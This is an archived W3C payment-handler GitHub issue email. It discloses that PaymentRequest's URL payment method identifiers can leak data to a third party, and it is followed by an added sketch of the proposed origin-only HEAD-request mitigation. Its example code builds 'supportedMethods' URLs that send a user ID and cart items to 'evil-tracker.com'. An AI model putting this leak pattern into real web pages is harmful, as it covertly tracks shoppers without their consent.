- From: Marcos Cáceres <notifications@github.com>
- Date: Mon, 04 Mar 2019 22:39:17 -0800
- To: w3c/payment-handler <payment-handler@noreply.github.com>
- Cc: Subscribed <subscribed@noreply.github.com>
Received on Tuesday, 5 March 2019 06:39:40 UTC
Given:
```JS
const methodData = [
  {
    supportedMethods: "https://evil-tracker.com/?userid=123",
  },
];
const details = {
  total: {
    label: "Total due",
    amount: { currency: "USD", value: "0.0" },
  },
};
new PaymentRequest(methodData, details);
```
This means that one can do:
```JS
const methodData = [
  // Leak stuff... not a real payment handler
  {
    supportedMethods: `https://evil-tracker.com/?userid=123&displayItems=${details.displayItems}`,
  },
  {
    supportedMethods: "basic-card",
  },
];
```
I wonder if for URL-based payment method identifiers we should allow any URL structure, but only allow HEAD requests to `new URL("./well-known/payment-handler.json", handlerOrigin)` with a restricted referrer policy and everything stripped?
--
Reply to this email directly or view it on GitHub:
https://github.com/w3c/payment-handler/issues/334
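An added sketch of the mitigation proposed in the message above (not code from the thread or from any browser): each URL-based identifier is reduced to its origin before anything is fetched, so page-supplied path and query data never reaches the network. The function names, the choice of `no-referrer` and `credentials: "omit"` as the reading of "everything stripped", and the sample identifiers are assumptions.

```javascript
// Added example; helper names are hypothetical, not part of any spec or browser API.
// Path exactly as written in the message above.
const MANIFEST_PATH = "./well-known/payment-handler.json";

// Returns the only request a user agent would issue for one identifier,
// or null when nothing should be fetched at all.
function manifestProbeFor(identifier) {
  let parsed;
  try {
    parsed = new URL(identifier);
  } catch {
    return null; // not an absolute URL, e.g. "basic-card"
  }
  if (parsed.protocol !== "https:") {
    return null; // only https identifiers are probed (assumption)
  }
  // Only the origin survives: path, query, fragment and userinfo are dropped.
  const url = new URL(MANIFEST_PATH, parsed.origin).href;
  return {
    url,
    init: {
      method: "HEAD",                // no response body is read
      referrerPolicy: "no-referrer", // the merchant page URL is not disclosed
      credentials: "omit",           // no cookies or HTTP auth are attached
    },
  };
}

// Collapses a methodData array to the distinct probes it would trigger.
function probesFor(methodData) {
  const seen = new Map();
  for (const { supportedMethods } of methodData) {
    const probe = manifestProbeFor(supportedMethods);
    if (probe && !seen.has(probe.url)) seen.set(probe.url, probe);
  }
  return [...seen.values()];
}

// Constructed sample input modelled on the snippets in the message.
const sampleMethodData = [
  { supportedMethods: "https://evil-tracker.com/?userid=123" },
  { supportedMethods: `https://evil-tracker.com/?userid=456&displayItems=${"cart"}` },
  { supportedMethods: "basic-card" },
];
const sampleProbes = probesFor(sampleMethodData);
```

Both tracker identifiers collapse to one identical request, so the `userid` and `displayItems` values never leave the page.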